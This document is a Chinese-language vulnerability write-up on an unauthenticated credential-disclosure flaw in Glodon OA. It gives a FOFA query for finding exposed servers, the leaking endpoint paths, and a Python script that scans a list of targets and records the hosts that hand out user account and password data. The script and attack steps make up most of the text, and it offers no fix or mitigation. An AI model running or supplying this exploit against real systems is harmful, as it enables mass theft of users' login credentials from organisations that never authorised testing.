漏洞描述

广联达科技股份有限公司以建设工程领域专业应用为核心基础支撑，提供一百余款基于“端+云+大数据”产品/服务，提供产业大数据、产业新金融等增值服务的数字建筑平台服务商。广联达OA存在信息泄露漏洞，由于某些接口没有鉴权，导致未经身份认证的远程攻击者可以利用该接口输出用户的账号密码。

漏洞复现

FOFA

app="Glodon-企业管理产品"

POC

IP+/Org/service/Service.asmx

查看所有用户
/Org/service/Service.asmx/GetUserXml4GEPS
查看账户密码
/Org/service/Service.asmx/GetUserXml4GEPS

查看账户密码

python脚本

import argparse  
import time  
import requests  
from urllib.parse import urlsplit  
import warnings  
from urllib3.exceptions import InsecureRequestWarning  
  
color_red = '\033[91m'  
color_green = '\033[92m'  
color_blue = '\033[94m'  
color_reset = '\033[0m'  
  
def get_url(file):  
    with open(file, 'r', encoding='utf-8') as f:  
        for url in f:  
            url = url.replace('\n', '')  
            if "http" not in url:  
                url = "http://" + url  
            parsed_url = urlsplit(url)  
            base_url = parsed_url.scheme + "://" + parsed_url.netloc  
            send_req(base_url)  
  
def write_result(content):  
    with open("result.txt", "a", encoding="UTF-8") as f:  
        f.write('{}\n'.format(content))  
  
warnings.filterwarnings("ignore", category=InsecureRequestWarning)  
  
def send_req(url_check):  
    url = url_check + '/Org/service/Service.asmx/GetAllUsersXml'  
    header = {  
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",  
        'Connection': 'close'  
    }  
    try:  
        response = requests.get(url=url, headers=header, verify=False, timeout=3)  
        if response.status_code == 200 and "<?xml" in response.text and "UserId=" in response.text and "SUserId=" in response.text and "Code=" in response.text:  
            response = requests.get(url=url_check + '/Org/service/Service.asmx/GetUserXml4GEPS', headers=header, verify=False, timeout=3)  
            if response.status_code == 200:  
                result2 = f"{url_check}/Org/service/Service.asmx/GetUserXml4GEPS"  
                print(color_red + result2 + color_reset)  # Added color_reset to avoid colored text issues  
                write_result(result2)  
        time.sleep(1)  
    except Exception as e:  
        pass  
  
if __name__ == '__main__':  
    parser = argparse.ArgumentParser()  
    parser.add_argument("-f", "--file", help="URL地址文件")  
    args = parser.parse_args()  
  
    if args.file:  
        get_url(args.file)  
    else:  
        print("使用-f加url文件地址")

执行效果